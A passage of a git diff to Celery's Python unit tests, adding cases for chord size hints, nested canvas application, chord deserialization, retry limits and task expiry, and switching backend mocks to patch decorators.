+ mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count)
+
+ @pytest.mark.xfail(reason="Invalid canvas setup with bad exception")
+ def test_apply_contains_chords_containing_empty_chain(self):
+ gchild_sig = chain(tuple())
+ child_count = 24
+ child_chord = chord((gchild_sig, ), self.add.si(0, 0))
+ group_sig = group((child_chord, ) * child_count)
+ # This is an invalid setup because we can't complete a chord header if
+ # there are no actual tasks which will run in it. However, the current
+ # behaviour of an `IndexError` isn't particularly helpful to a user.
+ group_sig.apply_async()
+
+ def test_apply_contains_chords_containing_chain_with_empty_tail(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ tail_count = 24
+ gchild_sig = chain(
+ (ggchild_sig, ) * ggchild_count +
+ (group((ggchild_sig, ) * tail_count), group(tuple()), ),
+ )
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ))
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == 1
+ assert len(res_obj.children) == 1
+ # We must have set the chord sizes based on the size of the last
+ # non-empty task in the encapsulated chains - in this case `tail_count`
+ # for the group preceding the empty one in each grandchild chain
+ mock_set_chord_size.assert_called_once_with(ANY, tail_count)
+
+ def test_apply_contains_chords_containing_group(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ gchild_sig = group((ggchild_sig, ) * ggchild_count)
+ child_count = 24
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We see applies for all of the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count * ggchild_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the encapsulated groups - in this case `ggchild_count`
+ mock_set_chord_size.assert_has_calls(
+ (call(ANY, ggchild_count), ) * child_count,
+ )
+
+ @pytest.mark.xfail(reason="Invalid canvas setup but poor behaviour")
+ def test_apply_contains_chords_containing_empty_group(self):
+ gchild_sig = group(tuple())
+ child_count = 24
+ child_chord = chord((gchild_sig, ), self.add.si(0, 0))
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+ # This is actually kind of meaningless because, similar to the empty
+ # chain test, this is an invalid setup. However, we should probably
+ # expect that the chords are dealt with in some other way the probably
+ # being left incomplete forever...
+ mock_set_chord_size.assert_has_calls((call(ANY, 0), ) * child_count)
+
+ def test_apply_contains_chords_containing_chord(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ gchild_sig = chord((ggchild_sig, ) * ggchild_count, ggchild_sig)
+ child_count = 24
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We see applies for all of the header great-grandchildren because the
+ # tasks are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count * ggchild_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the deeply encapsulated chords' header tasks, as well as for each
+ # child chord. This means we have `child_count` interleaved calls to
+ # set chord sizes of 1 and `ggchild_count`.
+ mock_set_chord_size.assert_has_calls(
+ (call(ANY, 1), call(ANY, ggchild_count), ) * child_count,
+ )
+
+ def test_apply_contains_chords_containing_empty_chord(self):
+ gchild_sig = chord(tuple(), self.add.si(0, 0))
+ child_count = 24
+ child_chord = chord((gchild_sig, ), self.add.si(0, 0))
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the encapsulated chains - in this case 1 for each child chord
+ mock_set_chord_size.assert_has_calls((call(ANY, 1), ) * child_count)
+
class test_chord(CanvasCase):
+ def test__get_app_does_not_exhaust_generator(self):
+ def build_generator():
+ yield self.add.s(1, 1)
+ self.second_item_returned = True
+ yield self.add.s(2, 2)
+ raise pytest.fail("This should never be reached")
+
+ self.second_item_returned = False
+ c = chord(build_generator(), self.add.s(3))
+ c.app
+ # The second task gets returned due to lookahead in `regen()`
+ assert self.second_item_returned
+ # Access it again to make sure the generator is not further evaluated
+ c.app
+
def test_reverse(self):
x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4))
assert isinstance(signature(x), chord)
@@ -743,12 +1035,179 @@ def test_app_fallback_to_current(self):
x = chord([t1], body=t1)
assert x.app is current_app
- def test_chord_size_with_groups(self):
- x = chord([
- self.add.s(2, 2) | group([self.add.si(2, 2), self.add.si(2, 2)]),
- self.add.s(2, 2) | group([self.add.si(2, 2), self.add.si(2, 2)]),
- ], body=self.add.si(2, 2))
- assert x.__length_hint__() == 4
+ def test_chord_size_simple(self):
+ sig = chord(self.add.s())
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_with_body(self):
+ sig = chord(self.add.s(), self.add.s())
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_explicit_group_single(self):
+ sig = chord(group(self.add.s()))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_explicit_group_many(self):
+ sig = chord(group([self.add.s()] * 42))
+ assert sig.__length_hint__() == 42
+
+ def test_chord_size_implicit_group_single(self):
+ sig = chord([self.add.s()])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_implicit_group_many(self):
+ sig = chord([self.add.s()] * 42)
+ assert sig.__length_hint__() == 42
+
+ def test_chord_size_chain_single(self):
+ sig = chord(chain(self.add.s()))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_chain_many(self):
+ # Chains get flattened into the encapsulating chord so even though the
+ # chain would only count for 1, the tasks we pulled into the chord's
+ # header and are counted as a bunch of simple signature objects
+ sig = chord(chain([self.add.s()] * 42))
+ assert sig.__length_hint__() == 42
+
+ def test_chord_size_nested_chain_chain_single(self):
+ sig = chord(chain(chain(self.add.s())))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chain_chain_many(self):
+ # The outer chain will be pulled up into the chord but the lower one
+ # remains and will only count as a single final element
+ sig = chord(chain(chain([self.add.s()] * 42)))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_implicit_chain_single(self):
+ sig = chord([self.add.s()])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_implicit_chain_many(self):
+ # This isn't a chain object so the `tasks` attribute can't be lifted
+ # into the chord - this isn't actually valid and would blow up we tried
+ # to run it but it sanity checks our recursion
+ sig = chord([[self.add.s()] * 42])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_implicit_chain_chain_single(self):
+ sig = chord([chain(self.add.s())])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_implicit_chain_chain_many(self):
+ sig = chord([chain([self.add.s()] * 42)])
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chord_body_simple(self):
+ sig = chord(chord(tuple(), self.add.s()))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chord_body_implicit_group_single(self):
+ sig = chord(chord(tuple(), [self.add.s()]))
+ assert sig.__length_hint__() == 1
+
+ def test_chord_size_nested_chord_body_implicit_group_many(self):
+ sig = chord(chord(tuple(), [self.add.s()] * 42))
+ assert sig.__length_hint__() == 42
+
+ # Nested groups in a chain only affect the chord size if they are the last
+ # element in the chain - in that case each group element is counted
+ def test_chord_size_nested_group_chain_group_head_single(self):
+ x = chord(
+ group(
+ [group(self.add.s()) | self.add.s()] * 42
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_group_chain_group_head_many(self):
+ x = chord(
+ group(
+ [group([self.add.s()] * 4) | self.add.s()] * 2
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 2
+
+ def test_chord_size_nested_group_chain_group_mid_single(self):
+ x = chord(
+ group(
+ [self.add.s() | group(self.add.s()) | self.add.s()] * 42
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_group_chain_group_mid_many(self):
+ x = chord(
+ group(
+ [self.add.s() | group([self.add.s()] * 4) | self.add.s()] * 2
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 2
+
+ def test_chord_size_nested_group_chain_group_tail_single(self):
+ x = chord(
+ group(
+ [self.add.s() | group(self.add.s())] * 42
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_group_chain_group_tail_many(self):
+ x = chord(
+ group(
+ [self.add.s() | group([self.add.s()] * 4)] * 2
+ ),
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 4 * 2
+
+ def test_chord_size_nested_implicit_group_chain_group_tail_single(self):
+ x = chord(
+ [self.add.s() | group(self.add.s())] * 42,
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 42
+
+ def test_chord_size_nested_implicit_group_chain_group_tail_many(self):
+ x = chord(
+ [self.add.s() | group([self.add.s()] * 4)] * 2,
+ body=self.add.s()
+ )
+ assert x.__length_hint__() == 4 * 2
+
+ def test_chord_size_deserialized_element_single(self):
+ child_sig = self.add.s()
+ deserialized_child_sig = json.loads(json.dumps(child_sig))
+ # We have to break in to be sure that a child remains as a `dict` so we
+ # can confirm that the length hint will instantiate a `Signature`
+ # object and then descend as expected
+ chord_sig = chord(tuple())
+ chord_sig.tasks = [deserialized_child_sig]
+ with patch(
+ "celery.canvas.Signature.from_dict", return_value=child_sig
+ ) as mock_from_dict:
+ assert chord_sig. __length_hint__() == 1
+ mock_from_dict.assert_called_once_with(deserialized_child_sig)
+
+ def test_chord_size_deserialized_element_many(self):
+ child_sig = self.add.s()
+ deserialized_child_sig = json.loads(json.dumps(child_sig))
+ # We have to break in to be sure that a child remains as a `dict` so we
+ # can confirm that the length hint will instantiate a `Signature`
+ # object and then descend as expected
+ chord_sig = chord(tuple())
+ chord_sig.tasks = [deserialized_child_sig] * 42
+ with patch(
+ "celery.canvas.Signature.from_dict", return_value=child_sig
+ ) as mock_from_dict:
+ assert chord_sig. __length_hint__() == 42
+ mock_from_dict.assert_has_calls([call(deserialized_child_sig)] * 42)
def test_set_immutable(self):
x = chord([Mock(name='t1'), Mock(name='t2')], app=self.app)
@@ -773,22 +1232,35 @@ def test_repr(self):
x.kwargs['body'] = None
assert 'without body' in repr(x)
- def test_freeze_tasks_body_is_group(self):
- # Confirm that `group index` is passed from a chord to elements of its
- # body when the chord itself is encapsulated in a group
+ def test_freeze_tasks_body_is_group(self, subtests):
+ # Confirm that `group index` values counting up from 0 are set for
+ # elements of a chord's body when the chord is encapsulated in a group
body_elem = self.add.s()
- chord_body = group([body_elem])
+ chord_body = group([body_elem] * 42)
chord_obj = chord(self.add.s(), body=chord_body)
top_group = group([chord_obj])
# We expect the body to be the signature we passed in before we freeze
- (embedded_body_elem, ) = chord_obj.body.tasks
- assert embedded_body_elem is body_elem
- assert embedded_body_elem.options == dict()
- # When we freeze the chord, its body will be clones and options set
+ with subtests.test(msg="Validate body tasks are retained"):
+ assert all(
+ embedded_body_elem is body_elem
+ for embedded_body_elem in chord_obj.body.tasks
+ )
+ # We also expect the body to have no initial options - since all of the
+ # embedded body elements are confirmed to be `body_elem` this is valid
+ assert body_elem.options == {}
+ # When we freeze the chord, its body will be cloned and options set
top_group.freeze()
- (embedded_body_elem, ) = chord_obj.body.tasks
- assert embedded_body_elem is not body_elem
- assert embedded_body_elem.options["group_index"] == 0 # 0th task
+ with subtests.test(
+ msg="Validate body group indices count from 0 after freezing"
+ ):
+ assert all(
+ embedded_body_elem is not body_elem
+ for embedded_body_elem in chord_obj.body.tasks
+ )
+ assert all(
+ embedded_body_elem.options["group_index"] == i
+ for i, embedded_body_elem in enumerate(chord_obj.body.tasks)
+ )
def test_freeze_tasks_is_not_group(self):
x = chord([self.add.s(2, 2)], body=self.add.s(), app=self.app)
@@ -818,6 +1290,117 @@ def chord_add():
_state.task_join_will_block = fixture_task_join_will_block
result.task_join_will_block = fixture_task_join_will_block
+ def test_from_dict(self):
+ header = self.add.s(1, 2)
+ original_chord = chord(header=header)
+ rebuilt_chord = chord.from_dict(dict(original_chord))
+ assert isinstance(rebuilt_chord, chord)
+
+ def test_from_dict_with_body(self):
+ header = body = self.add.s(1, 2)
+ original_chord = chord(header=header, body=body)
+ rebuilt_chord = chord.from_dict(dict(original_chord))
+ assert isinstance(rebuilt_chord, chord)
+
+ def test_from_dict_deep_deserialize(self, subtests):
+ header = body = self.add.s(1, 2)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ with subtests.test(msg="Validate chord header tasks is deserialized"):
+ assert all(
+ isinstance(child_task, Signature)
+ for child_task in deserialized_chord.tasks
+ )
+ with subtests.test(msg="Verify chord body is deserialized"):
+ assert isinstance(deserialized_chord.body, Signature)
+
+ def test_from_dict_deep_deserialize_group(self, subtests):
+ header = body = group([self.add.s(1, 2)] * 42)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ # A header which is a group gets unpacked into the chord's `tasks`
+ with subtests.test(
+ msg="Validate chord header tasks are deserialized and unpacked"
+ ):
+ assert all(
+ isinstance(child_task, Signature)
+ and not isinstance(child_task, group)
+ for child_task in deserialized_chord.tasks
+ )
+ # A body which is a group remains as it we passed in
+ with subtests.test(
+ msg="Validate chord body is deserialized and not unpacked"
+ ):
+ assert isinstance(deserialized_chord.body, group)
+ assert all(
+ isinstance(body_child_task, Signature)
+ for body_child_task in deserialized_chord.body.tasks
+ )
+
+ def test_from_dict_deeper_deserialize_group(self, subtests):
+ inner_group = group([self.add.s(1, 2)] * 42)
+ header = body = group([inner_group] * 42)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ # A header which is a group gets unpacked into the chord's `tasks`
+ with subtests.test(
+ msg="Validate chord header tasks are deserialized and unpacked"
+ ):
+ assert all(
+ isinstance(child_task, group)
+ for child_task in deserialized_chord.tasks
+ )
+ assert all(
+ isinstance(grandchild_task, Signature)
+ for child_task in deserialized_chord.tasks
+ for grandchild_task in child_task.tasks
+ )
+ # A body which is a group remains as it we passed in
+ with subtests.test(
+ msg="Validate chord body is deserialized and not unpacked"
+ ):
+ assert isinstance(deserialized_chord.body, group)
+ assert all(
+ isinstance(body_child_task, group)
+ for body_child_task in deserialized_chord.body.tasks
+ )
+ assert all(
+ isinstance(body_grandchild_task, Signature)
+ for body_child_task in deserialized_chord.body.tasks
+ for body_grandchild_task in body_child_task.tasks
+ )
+
+ def test_from_dict_deep_deserialize_chain(self, subtests):
+ header = body = chain([self.add.s(1, 2)] * 42)
+ original_chord = chord(header=header, body=body)
+ serialized_chord = json.loads(json.dumps(original_chord))
+ deserialized_chord = chord.from_dict(serialized_chord)
+ with subtests.test(msg="Verify chord is deserialized"):
+ assert isinstance(deserialized_chord, chord)
+ # A header which is a chain gets unpacked into the chord's `tasks`
+ with subtests.test(
+ msg="Validate chord header tasks are deserialized and unpacked"
+ ):
+ assert all(
+ isinstance(child_task, Signature)
+ and not isinstance(child_task, chain)
+ for child_task in deserialized_chord.tasks
+ )
+ # A body which is a chain gets mutatated into the hidden `_chain` class
+ with subtests.test(
+ msg="Validate chord body is deserialized and not unpacked"
+ ):
+ assert isinstance(deserialized_chord.body, _chain)
+
class test_maybe_signature(CanvasCase):
diff --git a/t/unit/tasks/test_chord.py b/t/unit/tasks/test_chord.py
index e25e2ccc229..af4fdee4627 100644
--- a/t/unit/tasks/test_chord.py
+++ b/t/unit/tasks/test_chord.py
@@ -1,5 +1,5 @@
from contextlib import contextmanager
-from unittest.mock import Mock, patch, sentinel
+from unittest.mock import Mock, PropertyMock, patch, sentinel
import pytest
@@ -279,6 +279,24 @@ def test_apply(self):
finally:
chord.run = prev
+ def test_init(self):
+ from celery import chord
+ from celery.utils.serialization import pickle
+
+ @self.app.task(shared=False)
+ def addX(x, y):
+ return x + y
+
+ @self.app.task(shared=False)
+ def sumX(n):
+ return sum(n)
+
+ x = chord(addX.s(i, i) for i in range(10))
+ # kwargs used to nest and recurse in serialization/deserialization
+ # (#6810)
+ assert x.kwargs['kwargs'] == {}
+ assert pickle.loads(pickle.dumps(x)).kwargs == x.kwargs
+
class test_add_to_chord:
@@ -294,9 +312,8 @@ def adds(self, sig, lazy=False):
return self.add_to_chord(sig, lazy)
self.adds = adds
+ @patch('celery.Celery.backend', new=PropertyMock(name='backend'))
def test_add_to_chord(self):
- self.app.backend = Mock(name='backend')
-
sig = self.add.s(2, 2)
sig.delay = Mock(name='sig.delay')
self.adds.request.group = uuid()
@@ -333,8 +350,8 @@ def test_add_to_chord(self):
class test_Chord_task(ChordCase):
+ @patch('celery.Celery.backend', new=PropertyMock(name='backend'))
def test_run(self):
- self.app.backend = Mock()
self.app.backend.cleanup = Mock()
self.app.backend.cleanup.__name__ = 'cleanup'
Chord = self.app.tasks['celery.chord']
@@ -343,3 +360,13 @@ def test_run(self):
Chord(group(self.add.signature((i, i)) for i in range(5)), body)
Chord([self.add.signature((j, j)) for j in range(5)], body)
assert self.app.backend.apply_chord.call_count == 2
+
+ @patch('celery.Celery.backend', new=PropertyMock(name='backend'))
+ def test_run__chord_size_set(self):
+ Chord = self.app.tasks['celery.chord']
+ body = self.add.signature()
+ group_size = 4
+ group1 = group(self.add.signature((i, i)) for i in range(group_size))
+ result = Chord(group1, body)
+
+ self.app.backend.set_chord_size.assert_called_once_with(result.parent.id, group_size)
diff --git a/t/unit/tasks/test_result.py b/t/unit/tasks/test_result.py
index e3d06db0f30..4e0975bbc75 100644
--- a/t/unit/tasks/test_result.py
+++ b/t/unit/tasks/test_result.py
@@ -59,6 +59,9 @@ def add_pending_result(self, *args, **kwargs):
def wait_for_pending(self, *args, **kwargs):
return True
+ def remove_pending_result(self, *args, **kwargs):
+ return True
+
class test_AsyncResult:
@@ -708,19 +711,19 @@ def test_get_nested_without_native_join(self):
]),
]),
])
- ts.app.backend = backend
- vals = ts.get()
- assert vals == [
- '1.1',
- [
- '2.1',
+ with patch('celery.Celery.backend', new=backend):
+ vals = ts.get()
+ assert vals == [
+ '1.1',
[
- '3.1',
- '3.2',
- ]
- ],
- ]
+ '2.1',
+ [
+ '3.1',
+ '3.2',
+ ]
+ ],
+ ]
def test_getitem(self):
subs = [MockAsyncResultSuccess(uuid(), app=self.app),
@@ -771,15 +774,16 @@ def test_join_native(self):
results = [self.app.AsyncResult(uuid(), backend=backend)
for i in range(10)]
ts = self.app.GroupResult(uuid(), results)
- ts.app.backend = backend
- backend.ids = [result.id for result in results]
- res = ts.join_native()
- assert res == list(range(10))
- callback = Mock(name='callback')
- assert not ts.join_native(callback=callback)
- callback.assert_has_calls([
- call(r.id, i) for i, r in enumerate(ts.results)
- ])
+
+ with patch('celery.Celery.backend', new=backend):
+ backend.ids = [result.id for result in results]
+ res = ts.join_native()
+ assert res == list(range(10))
+ callback = Mock(name='callback')
+ assert not ts.join_native(callback=callback)
+ callback.assert_has_calls([
+ call(r.id, i) for i, r in enumerate(ts.results)
+ ])
def test_join_native_raises(self):
ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])
@@ -813,9 +817,9 @@ def test_iter_native(self):
results = [self.app.AsyncResult(uuid(), backend=backend)
for i in range(10)]
ts = self.app.GroupResult(uuid(), results)
- ts.app.backend = backend
- backend.ids = [result.id for result in results]
- assert len(list(ts.iter_native())) == 10
+ with patch('celery.Celery.backend', new=backend):
+ backend.ids = [result.id for result in results]
+ assert len(list(ts.iter_native())) == 10
def test_join_timeout(self):
ar = MockAsyncResultSuccess(uuid(), app=self.app)
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index 154ee0295cb..89689914f26 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -1,15 +1,15 @@
import socket
import tempfile
from datetime import datetime, timedelta
-from unittest.mock import ANY, MagicMock, Mock, patch
+from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import pytest
-from case import ContextMock
from kombu import Queue
from kombu.exceptions import EncodeError
from celery import Task, group, uuid
from celery.app.task import _reprtask
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import Ignore, ImproperlyConfigured, Retry
from celery.result import AsyncResult, EagerResult
from celery.utils.time import parse_iso8601
@@ -144,6 +144,27 @@ def retry_task_auto_retry_exception_with_new_args(self, ret=None, place_holder=N
self.retry_task_auto_retry_exception_with_new_args = retry_task_auto_retry_exception_with_new_args
+ @self.app.task(bind=True, max_retries=10, iterations=0, shared=False,
+ autoretry_for=(Exception,))
+ def retry_task_max_retries_override(self, **kwargs):
+ # Test for #6436
+ self.iterations += 1
+ if self.iterations == 3:
+ # I wanna force fail here cause i have enough
+ self.retry(exc=MyCustomException, max_retries=0)
+ self.retry(exc=MyCustomException)
+
+ self.retry_task_max_retries_override = retry_task_max_retries_override
+
+ @self.app.task(bind=True, max_retries=0, iterations=0, shared=False,
+ autoretry_for=(Exception,))
+ def retry_task_explicit_exception(self, **kwargs):
+ # Test for #6436
+ self.iterations += 1
+ raise MyCustomException()
+
+ self.retry_task_explicit_exception = retry_task_explicit_exception
+
@self.app.task(bind=True, max_retries=3, iterations=0, shared=False)
def retry_task_raise_without_throw(self, **kwargs):
self.iterations += 1
@@ -401,6 +422,12 @@ def test_signature_from_request__delivery_info(self):
assert sig.options['exchange'] == 'testex'
assert sig.options['routing_key'] == 'testrk'
+ def test_signature_from_request__shadow_name(self):
+ self.retry_task.push_request()
+ self.retry_task.request.shadow = 'test'
+ sig = self.retry_task.signature_from_request()
+ assert sig.options['shadow'] == 'test'
+
def test_retry_kwargs_can_be_empty(self):
self.retry_task_mockapply.push_request()
try:
@@ -432,6 +459,22 @@ def test_eager_retry_with_new_params(self):
def test_eager_retry_with_autoretry_for_exception(self):
assert self.retry_task_auto_retry_exception_with_new_args.si(place_holder="test").apply().get() == "test"
+ def test_retry_task_max_retries_override(self):
+ self.retry_task_max_retries_override.max_retries = 10
+ self.retry_task_max_retries_override.iterations = 0
+ result = self.retry_task_max_retries_override.apply()
+ with pytest.raises(MyCustomException):
+ result.get()
+ assert self.retry_task_max_retries_override.iterations == 3
+
+ def test_retry_task_explicit_exception(self):
+ self.retry_task_explicit_exception.max_retries = 0
+ self.retry_task_explicit_exception.iterations = 0
+ result = self.retry_task_explicit_exception.apply()
+ with pytest.raises(MyCustomException):
+ result.get()
+ assert self.retry_task_explicit_exception.iterations == 1
+
def test_retry_eager_should_return_value(self):
self.retry_task.max_retries = 3
self.retry_task.iterations = 0
@@ -529,7 +572,7 @@ def test_autoretry_backoff(self, randrange):
assert task.iterations == 4
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8]
@@ -544,7 +587,7 @@ def test_autoretry_backoff_jitter(self, randrange):
assert task.iterations == 4
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [0, 1, 3, 7]
@@ -576,7 +619,7 @@ def test_retry_backoff_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 32]
@@ -595,7 +638,7 @@ def test_retry_backoff_max_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 32]
@@ -607,7 +650,7 @@ def test_override_retry_backoff_max_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 16]
@@ -619,7 +662,7 @@ def test_retry_backoff_jitter_from_base(self):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [1, 2, 4, 8, 16, 32]
@@ -632,7 +675,7 @@ def test_override_backoff_jitter_from_base(self, randrange):
assert task.iterations == 6
retry_call_countdowns = [
- call[1]['countdown'] for call in fake_retry.call_args_list
+ call_[1]['countdown'] for call_ in fake_retry.call_args_list
]
assert retry_call_countdowns == [0, 1, 3, 7, 15, 31]
@@ -887,7 +930,7 @@ def test_regular_task(self):
consumer, sresult, self.mytask.name, name='Elaine M. Benes',
)
- # With ETA.
+ # With ETA, absolute expires.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'},
eta=self.now() + timedelta(days=1),
@@ -898,6 +941,39 @@ def test_regular_task(self):
name='George Costanza', test_eta=True, test_expires=True,
)
+ # With ETA, absolute expires without timezone.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Constanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=(self.now() + timedelta(hours=2)).replace(tzinfo=None),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Constanza', test_eta=True, test_expires=True,
+ )
+
+ # With ETA, absolute expires in the past.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=self.now() - timedelta(days=2),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
+ # With ETA, relative expires.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=2 * 24 * 60 * 60,
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
# With countdown.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'}, countdown=10, expires=12,
@@ -949,10 +1025,17 @@ def test_send_event(self):
retry=True, retry_policy=self.app.conf.task_publish_retry_policy)
def test_replace(self):
- sig1 = Mock(name='sig1')
+ sig1 = MagicMock(name='sig1')
sig1.options = {}
+ self.mytask.request.id = sentinel.request_id
with pytest.raises(Ignore):
self.mytask.replace(sig1)
+ sig1.freeze.assert_called_once_with(self.mytask.request.id)
+ sig1.set.assert_called_once_with(replaced_task_nesting=1,
+ chord=ANY,
+ group_id=ANY,
+ group_index=ANY,
+ root_id=ANY)
def test_replace_with_chord(self):
sig1 = Mock(name='sig1')
@@ -960,7 +1043,6 @@ def test_replace_with_chord(self):
with pytest.raises(ImproperlyConfigured):
self.mytask.replace(sig1)
- @pytest.mark.usefixtures('depends_on_current_app')
def test_replace_callback(self):
c = group([self.mytask.s()], app=self.app)
c.freeze = Mock(name='freeze')
@@ -968,29 +1050,23 @@ def test_replace_callback(self):
self.mytask.request.id = 'id'
self.mytask.request.group = 'group'
self.mytask.request.root_id = 'root_id'
- self.mytask.request.callbacks = 'callbacks'
- self.mytask.request.errbacks = 'errbacks'
-
- class JsonMagicMock(MagicMock):
- parent = None
-
- def __json__(self):
- return 'whatever'
-
- def reprcall(self, *args, **kwargs):
- return 'whatever2'
-
- mocked_signature = JsonMagicMock(name='s')
- accumulate_mock = JsonMagicMock(name='accumulate', s=mocked_signature)
- self.mytask.app.tasks['celery.accumulate'] = accumulate_mock
-
- try:
- self.mytask.replace(c)
- except Ignore:
- mocked_signature.return_value.set.assert_called_with(
- link='callbacks',
- link_error='errbacks',
- )
+ self.mytask.request.callbacks = callbacks = 'callbacks'
+ self.mytask.request.errbacks = errbacks = 'errbacks'
+
+ # Replacement groups get uplifted to chords so that we can accumulate
+ # the results and link call/errbacks - patch the appropriate `chord`
+ # methods so we can validate this behaviour
+ with patch(
+ "celery.canvas.chord.link"
+ ) as mock_chord_link, patch(
+ "celery.canvas.chord.link_error"
+ ) as mock_chord_link_error:
+ with pytest.raises(Ignore):
+ self.mytask.replace(c)
